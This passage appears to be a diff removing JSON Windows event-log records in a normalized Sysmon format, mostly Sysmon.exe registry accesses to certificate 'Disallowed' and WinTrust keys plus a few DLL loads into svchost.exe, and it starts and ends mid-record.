131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"image_load", - "image_name": "WsmAuto.dll", - "image_path": "C:\\Windows\\System32\\WsmAuto.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879640000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881210000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "miutils.dll", - "image_path": "C:\\Windows\\System32\\miutils.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - 
"timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WsmSvc.dll", - "image_path": "C:\\Windows\\System32\\WsmSvc.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 